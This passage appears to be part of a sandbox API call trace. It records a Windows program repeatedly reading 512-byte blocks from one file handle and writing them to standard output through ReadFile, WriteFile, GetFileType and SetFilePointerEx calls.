GetFileType (hFile=0x50) returned 0x1 [0162.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.991] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0162.991] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.991] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0162.991] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.991] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.991] GetFileType (hFile=0x50) returned 0x1 [0162.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.991] GetFileType (hFile=0x50) returned 0x1 [0162.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.991] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.991] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.991] GetFileType (hFile=0x50) returned 0x1 [0162.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.992] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.992] GetFileType (hFile=0x50) returned 0x1 [0162.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.992] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.992] GetFileType (hFile=0x50) returned 0x1 [0162.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.992] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.992] GetFileType (hFile=0x50) returned 0x1 [0162.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.992] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.992] GetFileType (hFile=0x50) returned 0x1 [0162.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.992] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.992] GetFileType (hFile=0x50) returned 0x1 [0162.992] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.992] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0162.993] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.993] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0162.993] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.993] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.993] GetFileType (hFile=0x50) returned 0x1 [0162.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.993] GetFileType (hFile=0x50) returned 0x1 [0162.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.993] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.993] GetFileType (hFile=0x50) returned 0x1 [0162.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.993] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.993] GetFileType (hFile=0x50) returned 0x1 [0162.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.993] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.993] GetFileType (hFile=0x50) returned 0x1 [0162.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.993] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.993] GetFileType (hFile=0x50) returned 0x1 [0162.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.993] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.993] GetFileType (hFile=0x50) returned 0x1 [0162.993] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.993] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.994] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.994] GetFileType (hFile=0x50) returned 0x1 [0162.994] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.994] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0162.994] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.994] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0162.994] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.994] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.994] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.994] GetFileType (hFile=0x50) returned 0x1 [0162.994] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.994] GetFileType (hFile=0x50) returned 0x1 [0162.994] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.994] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.994] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.994] GetFileType (hFile=0x50) returned 0x1 [0162.994] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.994] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.994] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.994] GetFileType (hFile=0x50) returned 0x1 [0162.994] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.994] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.994] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.994] GetFileType (hFile=0x50) returned 0x1 [0162.994] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.994] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.994] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.994] GetFileType (hFile=0x50) returned 0x1 [0162.994] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.994] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.994] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.994] GetFileType (hFile=0x50) returned 0x1 [0162.994] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.994] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.995] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.995] GetFileType (hFile=0x50) returned 0x1 [0162.995] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.995] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0162.995] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.995] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0162.995] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.995] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.995] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.995] GetFileType (hFile=0x50) returned 0x1 [0162.995] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.995] GetFileType (hFile=0x50) returned 0x1 [0162.995] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.995] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.995] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.995] GetFileType (hFile=0x50) returned 0x1 [0162.995] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.995] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.995] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.995] GetFileType (hFile=0x50) returned 0x1 [0162.995] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.995] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.995] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.995] GetFileType (hFile=0x50) returned 0x1 [0162.995] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.995] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.995] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.995] GetFileType (hFile=0x50) returned 0x1 [0162.995] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.995] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.995] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.996] GetFileType (hFile=0x50) returned 0x1 [0162.996] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.996] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.996] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.996] GetFileType (hFile=0x50) returned 0x1 [0162.996] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.996] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0162.996] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.996] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0162.996] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.996] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.996] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.996] GetFileType (hFile=0x50) returned 0x1 [0162.996] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.996] GetFileType (hFile=0x50) returned 0x1 [0162.996] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.996] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.996] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.996] GetFileType (hFile=0x50) returned 0x1 [0162.996] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.996] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.996] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.996] GetFileType (hFile=0x50) returned 0x1 [0162.997] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.997] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.997] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.997] GetFileType (hFile=0x50) returned 0x1 [0162.997] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.997] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.997] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.997] GetFileType (hFile=0x50) returned 0x1 [0162.997] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.997] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.997] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.997] GetFileType (hFile=0x50) returned 0x1 [0162.997] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.997] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.997] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.997] GetFileType (hFile=0x50) returned 0x1 [0162.997] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.997] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0162.997] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.997] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0162.997] _get_osfhandle (_FileHandle=4) returned 0x58 [0162.997] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0162.997] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.997] GetFileType (hFile=0x50) returned 0x1 [0162.998] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.998] GetFileType (hFile=0x50) returned 0x1 [0162.998] _get_osfhandle (_FileHandle=1) returned 0x50 [0162.998] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0162.998] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.003] GetFileType (hFile=0x50) returned 0x1 [0163.003] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.003] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0163.004] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.004] GetFileType (hFile=0x50) returned 0x1 [0163.004] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.004] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0163.004] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.004] GetFileType (hFile=0x50) returned 0x1 [0163.004] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.004] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0163.004] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.004] GetFileType (hFile=0x50) returned 0x1 [0163.004] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.004] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0163.004] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.004] GetFileType (hFile=0x50) returned 0x1 [0163.004] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.004] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0163.004] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.004] GetFileType (hFile=0x50) returned 0x1 [0163.004] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.004] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0163.004] _get_osfhandle (_FileHandle=4) returned 0x58 [0163.004] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0163.004] _get_osfhandle (_FileHandle=4) returned 0x58 [0163.005] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.005] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.005] GetFileType (hFile=0x50) returned 0x1 [0163.005] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.005] GetFileType (hFile=0x50) returned 0x1 [0163.005] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.005] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0163.005] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.005] GetFileType (hFile=0x50) returned 0x1 [0163.005] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.005] WriteFile (in: hFile=0x50, lpBuffer=0x22edec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22edec*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0163.005] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.005] GetFileType (hFile=0x50) returned 0x1 [0163.005] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.005] WriteFile (in: hFile=0x50, lpBuffer=0x22ee3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee3c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0163.005] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.005] GetFileType (hFile=0x50) returned 0x1 [0163.005] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.005] WriteFile (in: hFile=0x50, lpBuffer=0x22ee8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ee8c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0163.005] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.005] GetFileType (hFile=0x50) returned 0x1 [0163.005] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.005] WriteFile (in: hFile=0x50, lpBuffer=0x22eedc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22eedc*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0163.005] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.005] GetFileType (hFile=0x50) returned 0x1 [0163.005] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.006] WriteFile (in: hFile=0x50, lpBuffer=0x22ef2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef2c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0163.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.006] GetFileType (hFile=0x50) returned 0x1 [0163.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.006] WriteFile (in: hFile=0x50, lpBuffer=0x22ef7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ef7c*, lpNumberOfBytesWritten=0x22df80*=0x20, lpOverlapped=0x0) returned 1 [0163.006] _get_osfhandle (_FileHandle=4) returned 0x58 [0163.006] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22df6c | out: lpNewFilePointer=0x0) returned 1 [0163.006] _get_osfhandle (_FileHandle=4) returned 0x58 [0163.006] ReadFile (in: hFile=0x58, lpBuffer=0x22ed9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x22df8c, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesRead=0x22df8c*=0x200, lpOverlapped=0x0) returned 1 [0163.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.006] GetFileType (hFile=0x50) returned 0x1 [0163.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.006] GetFileType (hFile=0x50) returned 0x1 [0163.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.006] WriteFile (in: hFile=0x50, lpBuffer=0x22ed9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x22df80, lpOverlapped=0x0 | out: lpBuffer=0x22ed9c*, lpNumberOfBytesWritten=0x22df80*=0x50, lpOverlapped=0x0) returned 1 [0163.006] _get_osfhandle (_FileHandle=1) returned 0x50 [0163.006] GetFileType (hFile=0x50) returned 0x1 [0163.006] _get_osfhandle (_FileHandle=1) returned 